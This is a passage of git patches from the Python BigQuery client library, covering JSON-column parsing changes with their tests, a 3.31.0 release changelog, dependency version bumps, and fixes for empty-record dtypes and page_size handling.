pyarrow_timestamp(): def bq_to_arrow_scalars(bq_scalar: str): """ + DEPRECATED: update pandas_gbq.schema.bigquery_to_pyarrow, instead, which is + to be added in https://github.com/googleapis/python-bigquery-pandas/pull/893. + Returns: The Arrow scalar type that the input BigQuery scalar type maps to. If it cannot find the BigQuery scalar, return None. @@ -116,6 +138,8 @@ def bq_to_arrow_scalars(bq_scalar: str): def arrow_scalar_ids_to_bq(arrow_scalar: Any): """ + DEPRECATED: update pandas_gbq.schema.pyarrow_to_bigquery, instead. + Returns: The BigQuery scalar type that the input arrow scalar type maps to. If it cannot find the arrow scalar, return None. diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index f139e44ad..238ff6beb 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -3533,7 +3533,9 @@ def _row_iterator_page_columns(schema, response): def get_column_data(field_index, field): for row in rows: - yield _helpers.CELL_DATA_PARSER.to_py(row["f"][field_index]["v"], field) + yield _helpers.DATA_FRAME_CELL_DATA_PARSER.to_py( + row["f"][field_index]["v"], field + ) for field_index, field in enumerate(schema): columns.append(get_column_data(field_index, field)) diff --git a/tests/system/test_arrow.py b/tests/system/test_arrow.py index 82cf11f85..f2aed656c 100644 --- a/tests/system/test_arrow.py +++ b/tests/system/test_arrow.py @@ -194,3 +194,32 @@ def test_list_rows_range_csv( range_type = schema.field("range_date").type assert range_type == expected_type + + +def test_to_arrow_query_with_empty_results(bigquery_client): + """ + JSON regression test for https://github.com/googleapis/python-bigquery/issues/1580. + """ + job = bigquery_client.query( + """ + select + 123 as int_col, + '' as string_col, + to_json('{}') as json_col, + struct(to_json('[]') as json_field, -1 as int_field) as struct_col, + [to_json('null')] as json_array_col, + from unnest([]) + """ + ) + table = job.to_arrow() + assert list(table.column_names) == [ + "int_col", + "string_col", + "json_col", + "struct_col", + "json_array_col", + ] + assert table.shape == (0, 5) + struct_type = table.field("struct_col").type + assert struct_type.get_field_index("json_field") == 0 + assert struct_type.get_field_index("int_field") == 1 diff --git a/tests/system/test_pandas.py b/tests/system/test_pandas.py index e65fca27e..01f552435 100644 --- a/tests/system/test_pandas.py +++ b/tests/system/test_pandas.py @@ -1304,6 +1304,32 @@ def test_upload_time_and_datetime_56(bigquery_client, dataset_id): ] +def test_to_dataframe_query_with_empty_results(bigquery_client): + """ + JSON regression test for https://github.com/googleapis/python-bigquery/issues/1580. + """ + job = bigquery_client.query( + """ + select + 123 as int_col, + '' as string_col, + to_json('{}') as json_col, + struct(to_json('[]') as json_field, -1 as int_field) as struct_col, + [to_json('null')] as json_array_col, + from unnest([]) + """ + ) + df = job.to_dataframe() + assert list(df.columns) == [ + "int_col", + "string_col", + "json_col", + "struct_col", + "json_array_col", + ] + assert len(df.index) == 0 + + def test_to_dataframe_geography_as_objects(bigquery_client, dataset_id): wkt = pytest.importorskip("shapely.wkt") bigquery_client.query( diff --git a/tests/unit/_helpers/test_data_frame_cell_data_parser.py b/tests/unit/_helpers/test_data_frame_cell_data_parser.py new file mode 100644 index 000000000..c3332dc89 --- /dev/null +++ b/tests/unit/_helpers/test_data_frame_cell_data_parser.py @@ -0,0 +1,71 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import pytest + +import google.cloud.bigquery.schema + + +def create_field(mode="NULLABLE", type_="IGNORED", name="test_field", **kwargs): + return google.cloud.bigquery.schema.SchemaField(name, type_, mode=mode, **kwargs) + + +@pytest.fixture +def mut(): + from google.cloud.bigquery import _helpers + + return _helpers + + +@pytest.fixture +def object_under_test(mut): + return mut.DATA_FRAME_CELL_DATA_PARSER + + +def test_json_to_py_doesnt_parse_json(object_under_test): + coerced = object_under_test.json_to_py('{"key":"value"}', create_field()) + assert coerced == '{"key":"value"}' + + +def test_json_to_py_repeated_doesnt_parse_json(object_under_test): + coerced = object_under_test.json_to_py('{"key":"value"}', create_field("REPEATED")) + assert coerced == '{"key":"value"}' + + +def test_record_to_py_doesnt_parse_json(object_under_test): + subfield = create_field(type_="JSON", name="json") + field = create_field(fields=[subfield]) + value = {"f": [{"v": '{"key":"value"}'}]} + coerced = object_under_test.record_to_py(value, field) + assert coerced == {"json": '{"key":"value"}'} + + +def test_record_to_py_doesnt_parse_repeated_json(object_under_test): + subfield = create_field("REPEATED", "JSON", name="json") + field = create_field("REQUIRED", fields=[subfield]) + value = { + "f": [ + { + "v": [ + {"v": '{"key":"value0"}'}, + {"v": '{"key":"value1"}'}, + {"v": '{"key":"value2"}'}, + ] + } + ] + } + coerced = object_under_test.record_to_py(value, field) + assert coerced == { + "json": ['{"key":"value0"}', '{"key":"value1"}', '{"key":"value2"}'] + } diff --git a/tests/unit/test__pyarrow_helpers.py b/tests/unit/test__pyarrow_helpers.py index f0a872c88..06fc2eb85 100644 --- a/tests/unit/test__pyarrow_helpers.py +++ b/tests/unit/test__pyarrow_helpers.py @@ -27,8 +27,16 @@ def module_under_test(): def test_bq_to_arrow_scalars(module_under_test): assert ( - module_under_test.bq_to_arrow_scalars("BIGNUMERIC") - == module_under_test.pyarrow_bignumeric + module_under_test.bq_to_arrow_scalars("BIGNUMERIC")() + == module_under_test.pyarrow_bignumeric() + ) + assert ( + # Normally, we'd prefer JSON type built-in to pyarrow (added in 19.0.0), + # but we'd like this to map as closely to the BQ Storage API as + # possible, which uses the string() dtype, as JSON support in Arrow + # predates JSON support in BigQuery by several years. + module_under_test.bq_to_arrow_scalars("JSON")() + == pyarrow.string() ) assert module_under_test.bq_to_arrow_scalars("UNKNOWN_TYPE") is None diff --git a/tests/unit/test_table_arrow.py b/tests/unit/test_table_arrow.py index 6f1e6f76a..830c4ceb7 100644 --- a/tests/unit/test_table_arrow.py +++ b/tests/unit/test_table_arrow.py @@ -28,6 +28,7 @@ def test_to_arrow_with_jobs_query_response(): "fields": [ {"name": "name", "type": "STRING", "mode": "NULLABLE"}, {"name": "number", "type": "INTEGER", "mode": "NULLABLE"}, + {"name": "json", "type": "JSON", "mode": "NULLABLE"}, ] }, "jobReference": { @@ -37,15 +38,21 @@ def test_to_arrow_with_jobs_query_response(): }, "totalRows": "9", "rows": [ - {"f": [{"v": "Tiarra"}, {"v": "6"}]}, - {"f": [{"v": "Timothy"}, {"v": "325"}]}, - {"f": [{"v": "Tina"}, {"v": "26"}]}, - {"f": [{"v": "Tierra"}, {"v": "10"}]}, - {"f": [{"v": "Tia"}, {"v": "17"}]}, - {"f": [{"v": "Tiara"}, {"v": "22"}]}, - {"f": [{"v": "Tiana"}, {"v": "6"}]}, - {"f": [{"v": "Tiffany"}, {"v": "229"}]}, - {"f": [{"v": "Tiffani"}, {"v": "8"}]}, + {"f": [{"v": "Tiarra"}, {"v": "6"}, {"v": "123"}]}, + {"f": [{"v": "Timothy"}, {"v": "325"}, {"v": '{"key":"value"}'}]}, + {"f": [{"v": "Tina"}, {"v": "26"}, {"v": "[1,2,3]"}]}, + { + "f": [ + {"v": "Tierra"}, + {"v": "10"}, + {"v": '{"aKey": {"bKey": {"cKey": -123}}}'}, + ] + }, + {"f": [{"v": "Tia"}, {"v": "17"}, {"v": None}]}, + {"f": [{"v": "Tiara"}, {"v": "22"}, {"v": '"some-json-string"'}]}, + {"f": [{"v": "Tiana"}, {"v": "6"}, {"v": '{"nullKey":null}'}]}, + {"f": [{"v": "Tiffany"}, {"v": "229"}, {"v": '""'}]}, + {"f": [{"v": "Tiffani"}, {"v": "8"}, {"v": "[]"}]}, ], "totalBytesProcessed": "154775150", "jobComplete": True, @@ -65,7 +72,7 @@ def test_to_arrow_with_jobs_query_response(): ) records = rows.to_arrow() - assert records.column_names == ["name", "number"] + assert records.column_names == ["name", "number", "json"] assert records["name"].to_pylist() == [ "Tiarra", "Timothy", @@ -78,6 +85,17 @@ def test_to_arrow_with_jobs_query_response(): "Tiffani", ] assert records["number"].to_pylist() == [6, 325, 26, 10, 17, 22, 6, 229, 8] + assert records["json"].to_pylist() == [ + "123", + '{"key":"value"}', + "[1,2,3]", + '{"aKey": {"bKey": {"cKey": -123}}}', + None, + '"some-json-string"', + '{"nullKey":null}', + '""', + "[]", + ] def test_to_arrow_with_jobs_query_response_and_max_results(): @@ -87,6 +105,7 @@ def test_to_arrow_with_jobs_query_response_and_max_results(): "fields": [ {"name": "name", "type": "STRING", "mode": "NULLABLE"}, {"name": "number", "type": "INTEGER", "mode": "NULLABLE"}, + {"name": "json", "type": "JSON", "mode": "NULLABLE"}, ] }, "jobReference": { @@ -96,15 +115,21 @@ def test_to_arrow_with_jobs_query_response_and_max_results(): }, "totalRows": "9", "rows": [ - {"f": [{"v": "Tiarra"}, {"v": "6"}]}, - {"f": [{"v": "Timothy"}, {"v": "325"}]}, - {"f": [{"v": "Tina"}, {"v": "26"}]}, - {"f": [{"v": "Tierra"}, {"v": "10"}]}, - {"f": [{"v": "Tia"}, {"v": "17"}]}, - {"f": [{"v": "Tiara"}, {"v": "22"}]}, - {"f": [{"v": "Tiana"}, {"v": "6"}]}, - {"f": [{"v": "Tiffany"}, {"v": "229"}]}, - {"f": [{"v": "Tiffani"}, {"v": "8"}]}, + {"f": [{"v": "Tiarra"}, {"v": "6"}, {"v": "123"}]}, + {"f": [{"v": "Timothy"}, {"v": "325"}, {"v": '{"key":"value"}'}]}, + {"f": [{"v": "Tina"}, {"v": "26"}, {"v": "[1,2,3]"}]}, + { + "f": [ + {"v": "Tierra"}, + {"v": "10"}, + {"v": '{"aKey": {"bKey": {"cKey": -123}}}'}, + ] + }, + {"f": [{"v": "Tia"}, {"v": "17"}, {"v": None}]}, + {"f": [{"v": "Tiara"}, {"v": "22"}, {"v": '"some-json-string"'}]}, + {"f": [{"v": "Tiana"}, {"v": "6"}, {"v": '{"nullKey":null}'}]}, + {"f": [{"v": "Tiffany"}, {"v": "229"}, {"v": '""'}]}, + {"f": [{"v": "Tiffani"}, {"v": "8"}, {"v": "[]"}]}, ], "totalBytesProcessed": "154775150", "jobComplete": True, @@ -125,10 +150,11 @@ def test_to_arrow_with_jobs_query_response_and_max_results(): ) records = rows.to_arrow() - assert records.column_names == ["name", "number"] + assert records.column_names == ["name", "number", "json"] assert records["name"].to_pylist() == [ "Tiarra", "Timothy", "Tina", ] assert records["number"].to_pylist() == [6, 325, 26] + assert records["json"].to_pylist() == ["123", '{"key":"value"}', "[1,2,3]"] diff --git a/tests/unit/test_table_pandas.py b/tests/unit/test_table_pandas.py index 9e42fb737..94737732b 100644 --- a/tests/unit/test_table_pandas.py +++ b/tests/unit/test_table_pandas.py @@ -59,6 +59,7 @@ def test_to_dataframe_nullable_scalars( pyarrow.field( "timestamp_col", pyarrow.timestamp("us", tz=datetime.timezone.utc) ), + pyarrow.field("json_col", pyarrow.string()), ] ) arrow_table = pyarrow.Table.from_pydict( @@ -78,6 +79,7 @@ def test_to_dataframe_nullable_scalars( 2021, 8, 9, 13, 30, 44, 123456, tzinfo=datetime.timezone.utc ) ], + "json_col": ["{}"], }, schema=arrow_schema, ) @@ -94,6 +96,7 @@ def test_to_dataframe_nullable_scalars( bigquery.SchemaField("string_col", "STRING"), bigquery.SchemaField("time_col", "TIME"), bigquery.SchemaField("timestamp_col", "TIMESTAMP"), + bigquery.SchemaField("json_col", "JSON"), ] mock_client = mock.create_autospec(bigquery.Client) mock_client.project = "test-proj" @@ -117,6 +120,7 @@ def test_to_dataframe_nullable_scalars( assert df.dtypes["string_col"].name == "object" assert df.dtypes["time_col"].name == "dbtime" assert df.dtypes["timestamp_col"].name == "datetime64[ns, UTC]" + assert df.dtypes["json_col"].name == "object" # Check for expected values. assert df["bignumeric_col"][0] == decimal.Decimal("123.456789101112131415") From 85de1a361d8bbda7ff8a20b34ffd5a0e619a1f38 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Tue, 25 Mar 2025 13:45:20 -0500 Subject: [PATCH 078/202] chore(main): release 3.31.0 (#2139) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 21 +++++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 22 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 91d0a362d..4b115464c 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,27 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.31.0](https://github.com/googleapis/python-bigquery/compare/v3.30.0...v3.31.0) (2025-03-20) + + +### Features + +* Add query text and total bytes processed to RowIterator ([#2140](https://github.com/googleapis/python-bigquery/issues/2140)) ([2d5f932](https://github.com/googleapis/python-bigquery/commit/2d5f9320d7103bc64c7ba496ba54bb0ef52b5605)) +* Add support for Python 3.13 ([0842aa1](https://github.com/googleapis/python-bigquery/commit/0842aa10967b1d8395cfb43e52c8ea091b381870)) + + +### Bug Fixes + +* Adding property setter for table constraints, [#1990](https://github.com/googleapis/python-bigquery/issues/1990) ([#2092](https://github.com/googleapis/python-bigquery/issues/2092)) ([f8572dd](https://github.com/googleapis/python-bigquery/commit/f8572dd86595361bae82c3232b2c0d159690a7b7)) +* Allow protobuf 6.x ([0842aa1](https://github.com/googleapis/python-bigquery/commit/0842aa10967b1d8395cfb43e52c8ea091b381870)) +* Avoid "Unable to determine type" warning with JSON columns in `to_dataframe` ([#1876](https://github.com/googleapis/python-bigquery/issues/1876)) ([968020d](https://github.com/googleapis/python-bigquery/commit/968020d5be9d2a30b90d046eaf52f91bb2c70911)) +* Remove setup.cfg configuration for creating universal wheels ([#2146](https://github.com/googleapis/python-bigquery/issues/2146)) ([d7f7685](https://github.com/googleapis/python-bigquery/commit/d7f76853d598c354bfd2e65f5dde28dae97da0ec)) + + +### Dependencies + +* Remove Python 3.7 and 3.8 as supported runtimes ([#2133](https://github.com/googleapis/python-bigquery/issues/2133)) ([fb7de39](https://github.com/googleapis/python-bigquery/commit/fb7de398cb2ad000b80a8a702d1f6539dc03d8e0)) + ## [3.30.0](https://github.com/googleapis/python-bigquery/compare/v3.29.0...v3.30.0) (2025-02-26) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 01c4c51ca..c0f7a96d6 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.30.0" +__version__ = "3.31.0" From 4e618e560bfea1ca3b7f17b4fc1f8f438fa6c77e Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 27 Mar 2025 19:00:31 +0100 Subject: [PATCH 079/202] chore(deps): update all dependencies (#2143) * chore(deps): update all dependencies * pin ipython===8.18.1 for python 3.9 --------- Co-authored-by: Lingqing Gan --- samples/desktopapp/requirements-test.txt | 6 ++--- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements-test.txt | 4 +-- samples/geography/requirements.txt | 34 ++++++++++++------------ samples/magics/requirements-test.txt | 6 ++--- samples/magics/requirements.txt | 8 +++--- samples/notebooks/requirements-test.txt | 6 ++--- samples/notebooks/requirements.txt | 13 ++++----- samples/snippets/requirements-test.txt | 6 ++--- samples/snippets/requirements.txt | 2 +- 10 files changed, 44 insertions(+), 43 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index cf215e2fd..c8290d33f 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,3 +1,3 @@ -google-cloud-testutils==1.5.0 -pytest==8.3.4 -mock==5.1.0 +google-cloud-testutils==1.6.0 +pytest==8.3.5 +mock==5.2.0 diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index 165800741..fa349e0d3 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.27.0 +google-cloud-bigquery==3.31.0 google-auth-oauthlib==1.2.1 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 4ad1bd028..5d20a4554 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,2 +1,2 @@ -pytest==8.3.4 -mock==5.1.0 +pytest==8.3.5 +mock==5.2.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 0ad2154a4..3fa11ce7c 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,41 +1,41 @@ -attrs==24.3.0 -certifi==2024.12.14 +attrs==25.3.0 +certifi==2025.1.31 cffi==1.17.1 charset-normalizer==3.4.1 click==8.1.8 click-plugins==1.1.1 cligj==0.7.2 -db-dtypes==1.3.1 +db-dtypes==1.4.2 Fiona==1.10.1 geojson==3.2.0 geopandas==1.0.1 -google-api-core==2.24.0 -google-auth==2.37.0 -google-cloud-bigquery==3.27.0 -google-cloud-bigquery-storage==2.27.0 -google-cloud-core==2.4.1 -google-crc32c==1.6.0 +google-api-core==2.24.2 +google-auth==2.38.0 +google-cloud-bigquery==3.31.0 +google-cloud-bigquery-storage==2.30.0 +google-cloud-core==2.4.3 +google-crc32c==1.7.1 google-resumable-media==2.7.2 -googleapis-common-protos==1.66.0 -grpcio==1.69.0 +googleapis-common-protos==1.69.2 +grpcio==1.71.0 idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 packaging==24.2 pandas==2.2.3 -proto-plus==1.25.0 -pyarrow==18.1.0 +proto-plus==1.26.1 +pyarrow==19.0.1 pyasn1==0.6.1 pyasn1-modules==0.4.1 pycparser==2.22 -pyparsing==3.2.1 +pyparsing==3.2.3 python-dateutil==2.9.0.post0 -pytz==2024.2 +pytz==2025.2 PyYAML==6.0.2 requests==2.32.3 rsa==4.9 -Shapely==2.0.6 +Shapely==2.0.7 six==1.17.0 -typing-extensions==4.12.2 +typing-extensions==4.13.0 typing-inspect==0.9.0 urllib3==2.3.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index cf215e2fd..c8290d33f 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,3 +1,3 @@ -google-cloud-testutils==1.5.0 -pytest==8.3.4 -mock==5.1.0 +google-cloud-testutils==1.6.0 +pytest==8.3.5 +mock==5.2.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 4b81fe0ad..3ab215951 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ -bigquery_magics==0.5.0 -db-dtypes==1.3.1 -google.cloud.bigquery==3.27.0 -google-cloud-bigquery-storage==2.27.0 +bigquery_magics==0.9.0 +db-dtypes==1.4.2 +google.cloud.bigquery==3.31.0 +google-cloud-bigquery-storage==2.30.0 ipython===8.18.1 pandas==2.2.3 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index cf215e2fd..c8290d33f 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,3 +1,3 @@ -google-cloud-testutils==1.5.0 -pytest==8.3.4 -mock==5.1.0 +google-cloud-testutils==1.6.0 +pytest==8.3.5 +mock==5.2.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index e92d084a4..ca5505a2e 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,8 +1,9 @@ -bigquery-magics==0.5.0 -db-dtypes==1.3.1 -google-cloud-bigquery==3.27.0 -google-cloud-bigquery-storage==2.27.0 -ipython==8.18.1 +bigquery-magics==0.9.0 +db-dtypes==1.4.2 +google-cloud-bigquery==3.31.0 +google-cloud-bigquery-storage==2.30.0 +ipython===8.18.1; python_version == '3.9' +ipython==9.0.2; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' -matplotlib==3.10.0; python_version >= '3.10' +matplotlib==3.10.1; python_version >= '3.10' pandas==2.2.3 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 52ccc8ab2..197b89187 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,4 +1,4 @@ # samples/snippets should be runnable with no "extras" -google-cloud-testutils==1.5.0 -pytest==8.3.4 -mock==5.1.0 +google-cloud-testutils==1.6.0 +pytest==8.3.5 +mock==5.2.0 diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index 307ebac24..4b88c6b70 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.27.0 +google-cloud-bigquery==3.31.0 From c526822ce781d5c24e37703507d74fd785a5fe29 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 1 Apr 2025 00:40:19 +0200 Subject: [PATCH 080/202] chore(deps): update dependency pyasn1-modules to v0.4.2 (#2150) --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 3fa11ce7c..514e19d2c 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -26,7 +26,7 @@ pandas==2.2.3 proto-plus==1.26.1 pyarrow==19.0.1 pyasn1==0.6.1 -pyasn1-modules==0.4.1 +pyasn1-modules==0.4.2 pycparser==2.22 pyparsing==3.2.3 python-dateutil==2.9.0.post0 From 77d71736fcc006d3ab8f8ba17955ad5f06e21876 Mon Sep 17 00:00:00 2001 From: yokomotod Date: Wed, 2 Apr 2025 05:16:41 +0900 Subject: [PATCH 081/202] fix: empty record dtypes (#2147) * fix: empty record dtypes * update pandas minimum version * fix coverage * fix test_pandas --------- Co-authored-by: Lingqing Gan --- google/cloud/bigquery/table.py | 42 +++++++++++++++------------------- pyproject.toml | 2 +- testing/constraints-3.9.txt | 2 +- tests/system/test_pandas.py | 7 +----- tests/unit/test_table.py | 10 ++------ 5 files changed, 23 insertions(+), 40 deletions(-) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 238ff6beb..099f7fd69 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -2648,31 +2648,25 @@ def to_dataframe( if pyarrow.types.is_timestamp(col.type) ) - if len(record_batch) > 0: - df = record_batch.to_pandas( + df = record_batch.to_pandas( + date_as_object=date_as_object, + timestamp_as_object=timestamp_as_object, + integer_object_nulls=True, + types_mapper=_pandas_helpers.default_types_mapper( date_as_object=date_as_object, - timestamp_as_object=timestamp_as_object, - integer_object_nulls=True, - types_mapper=_pandas_helpers.default_types_mapper( - date_as_object=date_as_object, - bool_dtype=bool_dtype, - int_dtype=int_dtype, - float_dtype=float_dtype, - string_dtype=string_dtype, - date_dtype=date_dtype, - datetime_dtype=datetime_dtype, - time_dtype=time_dtype, - timestamp_dtype=timestamp_dtype, - range_date_dtype=range_date_dtype, - range_datetime_dtype=range_datetime_dtype, - range_timestamp_dtype=range_timestamp_dtype, - ), - ) - else: - # Avoid "ValueError: need at least one array to concatenate" on - # older versions of pandas when converting empty RecordBatch to - # DataFrame. See: https://github.com/pandas-dev/pandas/issues/41241 - df = pandas.DataFrame([], columns=record_batch.schema.names) + bool_dtype=bool_dtype, + int_dtype=int_dtype, + float_dtype=float_dtype, + string_dtype=string_dtype, + date_dtype=date_dtype, + datetime_dtype=datetime_dtype, + time_dtype=time_dtype, + timestamp_dtype=timestamp_dtype, + range_date_dtype=range_date_dtype, + range_datetime_dtype=range_datetime_dtype, + range_timestamp_dtype=range_timestamp_dtype, + ), + ) for column in dtypes: df[column] = pandas.Series(df[column], dtype=dtypes[column], copy=False) diff --git a/pyproject.toml b/pyproject.toml index 17bf4fd20..38d74cdd0 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -72,7 +72,7 @@ bqstorage = [ "pyarrow >= 4.0.0", ] pandas = [ - "pandas >= 1.1.4", + "pandas >= 1.3.0", "pandas-gbq >= 0.26.1", "grpcio >= 1.47.0, < 2.0.0", "grpcio >= 1.49.1, < 2.0.0; python_version >= '3.11'", diff --git a/testing/constraints-3.9.txt b/testing/constraints-3.9.txt index 63b5d8bf6..cb6c29f3b 100644 --- a/testing/constraints-3.9.txt +++ b/testing/constraints-3.9.txt @@ -21,7 +21,7 @@ opentelemetry-api==1.1.0 opentelemetry-instrumentation==0.20b0 opentelemetry-sdk==1.1.0 packaging==24.2.0 -pandas==1.1.4 +pandas==1.3.0 pandas-gbq==0.26.1 proto-plus==1.22.3 protobuf==3.20.2 diff --git a/tests/system/test_pandas.py b/tests/system/test_pandas.py index 01f552435..1fe7ff2cd 100644 --- a/tests/system/test_pandas.py +++ b/tests/system/test_pandas.py @@ -1222,12 +1222,7 @@ def test_list_rows_nullable_scalars_extreme_dtypes_w_custom_dtype( # These pandas dtypes are handled by the custom dtypes. assert df.dtypes["bool_col"].name == "boolean" - # Result is dependent upon which version of pandas is being used. - # Float64 was not introduced until pandas version 1.4. - if PANDAS_INSTALLED_VERSION >= "1.4": - assert df.dtypes["float64_col"].name == "Float64" - else: - assert df.dtypes["float64_col"].name == "string" + assert df.dtypes["float64_col"].name == "Float64" assert df.dtypes["int64_col"].name == "Int64" assert df.dtypes["string_col"].name == "string" diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index b846036ab..3588cfba6 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -4143,14 +4143,8 @@ def test_to_dataframe_w_dtypes_mapper(self): ) self.assertEqual(df.name.dtype.name, "string") - # While pyproject.toml lists pandas 1.1 as the lowest supported version of - # pandas, the pip resolver is not able to resolve pandas 1.1 and numpy - if hasattr(pandas, "Float64Dtype"): - self.assertEqual(list(df.miles), [1.77, 6.66, 2.0]) - self.assertEqual(df.miles.dtype.name, "Float64") - else: - self.assertEqual(list(df.miles), ["1.77", "6.66", "2.0"]) - self.assertEqual(df.miles.dtype.name, "string") + self.assertEqual(list(df.miles), [1.77, 6.66, 2.0]) + self.assertEqual(df.miles.dtype.name, "Float64") if hasattr(pandas, "ArrowDtype"): self.assertEqual( From c2343dd4a55cfe90bf450547eba45945e6d2ede6 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 3 Apr 2025 19:50:49 +0200 Subject: [PATCH 082/202] chore(deps): update dependency shapely to v2.1.0 (#2155) * chore(deps): update dependency shapely to v2.1.0 * pin Shapely===2.0.7 for python 3.9 --------- Co-authored-by: Lingqing Gan --- samples/geography/requirements.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 514e19d2c..5fe9005cc 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -34,7 +34,8 @@ pytz==2025.2 PyYAML==6.0.2 requests==2.32.3 rsa==4.9 -Shapely==2.0.7 +Shapely===2.0.7; python_version == '3.9' +Shapely==2.1.0; python_version >= '3.10' six==1.17.0 typing-extensions==4.13.0 typing-inspect==0.9.0 From e89a707b162182ededbf94cc9a0f7594bc2be475 Mon Sep 17 00:00:00 2001 From: Chelsea Lin Date: Thu, 3 Apr 2025 11:45:08 -0700 Subject: [PATCH 083/202] fix: table iterator should not use bqstorage when page_size is not None (#2154) * fix: table iterator should not use bqstorage when page_size is not None * fix dbapi cursor tests --- google/cloud/bigquery/table.py | 11 +++++++++-- tests/unit/test_dbapi_cursor.py | 1 + tests/unit/test_table.py | 7 +++++++ 3 files changed, 17 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 099f7fd69..8a3b6151a 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1873,6 +1873,11 @@ def total_bytes_processed(self) -> Optional[int]: """total bytes processed from job statistics, if present.""" return self._total_bytes_processed + @property + def page_size(self) -> Optional[int]: + """The maximum number of rows in each page of results from this request, if present.""" + return self._page_size + def _is_almost_completely_cached(self): """Check if all results are completely cached. @@ -1924,7 +1929,7 @@ def _should_use_bqstorage(self, bqstorage_client, create_bqstorage_client): if self._is_almost_completely_cached(): return False - if self.max_results is not None: + if self.max_results is not None or self.page_size is not None: return False try: @@ -1994,7 +1999,9 @@ def _maybe_warn_max_results( bqstorage_client: The BigQuery Storage client intended to use for downloading result rows. """ - if bqstorage_client is not None and self.max_results is not None: + if bqstorage_client is not None and ( + self.max_results is not None or self.page_size is not None + ): warnings.warn( "Cannot use bqstorage_client if max_results is set, " "reverting to fetching data with the REST endpoint.", diff --git a/tests/unit/test_dbapi_cursor.py b/tests/unit/test_dbapi_cursor.py index 6fca4cec0..cba9030de 100644 --- a/tests/unit/test_dbapi_cursor.py +++ b/tests/unit/test_dbapi_cursor.py @@ -161,6 +161,7 @@ def _mock_rows( mock_rows, ) mock_rows.max_results = None + mock_rows.page_size = None type(mock_rows).job_id = mock.PropertyMock(return_value="test-job-id") type(mock_rows).location = mock.PropertyMock(return_value="test-location") type(mock_rows).num_dml_affected_rows = mock.PropertyMock( diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 3588cfba6..a9966f1ce 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -2693,6 +2693,13 @@ def test__should_use_bqstorage_returns_false_if_max_results_set(self): ) self.assertFalse(result) + def test__should_use_bqstorage_returns_false_if_page_size_set(self): + iterator = self._make_one(page_size=10, first_page_response=None) # not cached + result = iterator._should_use_bqstorage( + bqstorage_client=None, 